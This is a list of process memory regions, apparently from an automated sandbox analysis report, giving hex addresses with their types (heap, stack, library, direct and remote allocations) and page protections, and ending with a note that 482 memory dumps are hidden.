18BDA780000
heap
page read and write
1CA46E1C000
trusted library allocation
page read and write
1CA5ED20000
heap
page read and write
889B000
heap
page read and write
1CA46E18000
trusted library allocation
page read and write
86E0000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
18BDC70B000
heap
page read and write
18BDA940000
heap
page read and write
79AE000
stack
page read and write
77C3000
heap
page read and write
8CA0000
direct allocation
page read and write
1CA5EEDC000
heap
page read and write
1CA4681C000
heap
page read and write
8785000
heap
page read and write
87A4000
heap
page read and write
88AC000
heap
page read and write
23B6D000
stack
page read and write
4E0E000
stack
page read and write
1CA485A1000
trusted library allocation
page read and write
7B70000
trusted library allocation
page read and write
7FFD9BA8A000
trusted library allocation
page read and write
F7637C000
stack
page read and write
8CB0000
direct allocation
page read and write
23CEF000
stack
page read and write
1CA467B0000
heap
page read and write
88A8000
heap
page read and write
7950000
heap
page execute and read and write
F768BE000
stack
page read and write
23D7F000
stack
page read and write
889C000
heap
page read and write
678AFE000
stack
page read and write
33C3000
trusted library allocation
page execute and read and write
4D8E000
stack
page read and write
31A0000
heap
page read and write
1CA44C00000
heap
page read and write
5E41000
trusted library allocation
page read and write
85C0000
trusted library allocation
page execute and read and write
89D0000
heap
page read and write
412C000
remote allocation
page execute and read and write
18BDC71F000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7FFD9B98C000
trusted library allocation
page execute and read and write
7FFD9B8D0000
trusted library allocation
page read and write
1CA56941000
trusted library allocation
page read and write
1CA46678000
heap
page read and write
88A7000
heap
page read and write
7360000
direct allocation
page read and write
18BDC713000
heap
page read and write
18BDA87A000
heap
page read and write
4D1E000
stack
page read and write
89C0000
trusted library allocation
page read and write
23BAE000
stack
page read and write
1CA56C09000
trusted library allocation
page read and write
1CA44D8A000
heap
page read and write
18BDC630000
heap
page read and write
33A0000
trusted library section
page read and write
7BB0000
trusted library allocation
page read and write
4CDC000
stack
page read and write
F7758B000
stack
page read and write
F765BE000
stack
page read and write
4E41000
trusted library allocation
page read and write
4D30000
heap
page read and write
33D9000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
6783FE000
stack
page read and write
7A2E000
stack
page read and write
1CA44D07000
heap
page read and write
F76636000
stack
page read and write
889B000
heap
page read and write
77DE000
heap
page read and write
1CA46DC7000
trusted library allocation
page read and write
31ED000
heap
page read and write
23CAE000
stack
page read and write
18BDC601000
heap
page read and write
1CA44B00000
heap
page read and write
1CA44CEF000
heap
page read and write
1CA44EC5000
heap
page read and write
33C0000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page execute and read and write
F769BB000
stack
page read and write
8720000
direct allocation
page read and write
18BDC6EC000
heap
page read and write
7FFD9B8DD000
trusted library allocation
page execute and read and write
87CA000
heap
page read and write
7FFD9BA81000
trusted library allocation
page read and write
7370000
direct allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
30A0000
heap
page read and write
F75FFE000
stack
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
7F0D0000
trusted library allocation
page execute and read and write
7FFD9BBE0000
trusted library allocation
page read and write
18BDC5EB000
heap
page read and write
5EA6000
trusted library allocation
page read and write
372C000
remote allocation
page execute and read and write
678DFB000
stack
page read and write
1CA46887000
heap
page read and write
7B20000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
3160000
heap
page read and write
1CA48576000
trusted library allocation
page read and write
23EE0000
remote allocation
page read and write
7FFD9BC60000
trusted library allocation
page read and write
8700000
direct allocation
page read and write
1CA5EED8000
heap
page read and write
18BDA918000
heap
page read and write
7FFD9BB60000
trusted library allocation
page read and write
23D3E000
stack
page read and write
23DD0000
heap
page read and write
8710000
trusted library allocation
page read and write
6789FD000
stack
page read and write
7D2C000
remote allocation
page execute and read and write
1CA468E0000
heap
page read and write
1CA44DC0000
trusted library allocation
page read and write
1CA44E30000
trusted library allocation
page read and write
8853000
heap
page read and write
B49C000
direct allocation
page execute and read and write
1CA4857B000
trusted library allocation
page read and write
D29C000
direct allocation
page execute and read and write
2C7B000
stack
page read and write
18BDA94A000
heap
page read and write
18BDC6D0000
heap
page read and write
1CA4858E000
trusted library allocation
page read and write
1CA56930000
trusted library allocation
page read and write
1CA46D99000
trusted library allocation
page read and write
8740000
heap
page read and write
18BDA88F000
heap
page read and write
18BDA850000
heap
page read and write
1CA5EED0000
heap
page read and write
8798000
heap
page read and write
F767BE000
stack
page read and write
18BDA8E0000
heap
page read and write
86C0000
trusted library allocation
page read and write
4D38000
heap
page read and write
6782FA000
stack
page read and write
7862000
heap
page read and write
1CA5EED4000
heap
page read and write
969C000
direct allocation
page execute and read and write
33F2000
trusted library allocation
page read and write
23FF5000
direct allocation
page read and write
1CA48591000
trusted library allocation
page read and write
F7740F000
stack
page read and write
1CA44C40000
heap
page read and write
678BFE000
stack
page read and write
88A3000
heap
page read and write
18BDA918000
heap
page read and write
7330000
direct allocation
page read and write
7320000
direct allocation
page read and write
86F0000
direct allocation
page read and write
1CA56921000
trusted library allocation
page read and write
1CA44E70000
heap
page read and write
4C5F000
stack
page read and write
18BDC601000
heap
page read and write
8859000
heap
page read and write
18BDC601000
heap
page read and write
85D0000
trusted library allocation
page read and write
77CB000
heap
page read and write
678CFF000
stack
page read and write
86A0000
heap
page read and write
7FFD9BC10000
trusted library allocation
page read and write
18BDA918000
heap
page read and write
18BDC5D8000
heap
page read and write
1CA46DA2000
trusted library allocation
page read and write
18BDC6EA000
heap
page read and write
6786FF000
stack
page read and write
7B80000
trusted library allocation
page read and write
7FFD9BAB5000
trusted library allocation
page read and write
8894000
heap
page read and write
74A0000
heap
page read and write
1CA44CF3000
heap
page read and write
86F0000
trusted library allocation
page read and write
8690000
trusted library allocation
page execute and read and write
8BD0000
trusted library allocation
page read and write
1CA5EE48000
heap
page read and write
574F000
trusted library allocation
page read and write
8615000
heap
page read and write
33C4000
trusted library allocation
page read and write
8856000
heap
page read and write
8610000
heap
page read and write
18BDA879000
heap
page read and write
7796000
heap
page read and write
87A0000
heap
page read and write
1CA48723000
trusted library allocation
page read and write
18BDA93C000
heap
page read and write
18BDA946000
heap
page read and write
7390000
direct allocation
page read and write
7750000
heap
page read and write
1CA4860C000
trusted library allocation
page read and write
86E0000
direct allocation
page read and write
88B2000
heap
page read and write
79EE000
stack
page read and write
23FF0000
heap
page read and write
1CA4880A000
trusted library allocation
page read and write
23FED000
stack
page read and write
18BDA926000
heap
page read and write
8C80000
direct allocation
page read and write
18BDA944000
heap
page read and write
1CA47507000
trusted library allocation
page read and write
8560000
heap
page readonly
8C90000
direct allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
864E000
stack
page read and write
18BDC5D1000
heap
page read and write
DC9C000
direct allocation
page execute and read and write
7295000
heap
page execute and read and write
1CA44D52000
heap
page read and write
71BF000
stack
page read and write
85B7000
stack
page read and write
8BC0000
trusted library allocation
page read and write
4C68000
trusted library allocation
page read and write
18BDC190000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
18BDC5E4000
heap
page read and write
1CA48610000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
F75F7E000
stack
page read and write
1CA46DA5000
trusted library allocation
page read and write
4D20000
trusted library allocation
page read and write
8ACC000
stack
page read and write
18BDC5F4000
heap
page read and write
1CA44DA0000
trusted library allocation
page read and write
18BDC70E000
heap
page read and write
1CA44D64000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
18BDA87F000
heap
page read and write
8859000
heap
page read and write
4EA2000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
4F98000
trusted library allocation
page read and write
18BDC5D2000
heap
page read and write
1CA46DC5000
trusted library allocation
page read and write
18BDA922000
heap
page read and write
1CA44DF0000
trusted library allocation
page read and write
8CF0000
direct allocation
page read and write
1CA48623000
trusted library allocation
page read and write
31FD000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
18BDA946000
heap
page read and write
1CA44DB0000
heap
page readonly
1CA47E40000
trusted library allocation
page read and write
5E69000
trusted library allocation
page read and write
1CA468C0000
heap
page execute and read and write
F766B9000
stack
page read and write
8760000
direct allocation
page read and write
F7647E000
stack
page read and write
7A40000
trusted library allocation
page read and write
F7693E000
stack
page read and write
18BDA8B1000
heap
page read and write
1CA44CAD000
heap
page read and write
18BDA94A000
heap
page read and write
883A000
heap
page read and write
23FAC000
stack
page read and write
18BDA6A0000
heap
page read and write
18BDC601000
heap
page read and write
23B2F000
stack
page read and write
1CA44CCD000
heap
page read and write
23C2C000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1CA46FEB000
trusted library allocation
page read and write
18BDA87E000
heap
page read and write
1CA474E2000
trusted library allocation
page read and write
7FFD9B8D3000
trusted library allocation
page execute and read and write
8740000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
F76577000
stack
page read and write
2C3C000
stack
page read and write
1CA46780000
heap
page execute and read and write
31FB000
heap
page read and write
18BDC5DB000
heap
page read and write
7FFD9BAB7000
trusted library allocation
page read and write
1CA46910000
heap
page execute and read and write
F75EF3000
stack
page read and write
1CA44BE0000
heap
page read and write
1CA484CB000
trusted library allocation
page read and write
18BDA92D000
heap
page read and write
3050000
heap
page read and write
31E1000
heap
page read and write
2C80000
remote allocation
page execute and read and write
18BDC5F7000
heap
page read and write
33D0000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page execute and read and write
771E000
stack
page read and write
7B40000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
18BDA7A0000
heap
page read and write
18BDA91B000
heap
page read and write
23EE0000
remote allocation
page read and write
884B000
heap
page read and write
18BDA8B1000
heap
page read and write
There are 482 hidden memdumps, click here to show them.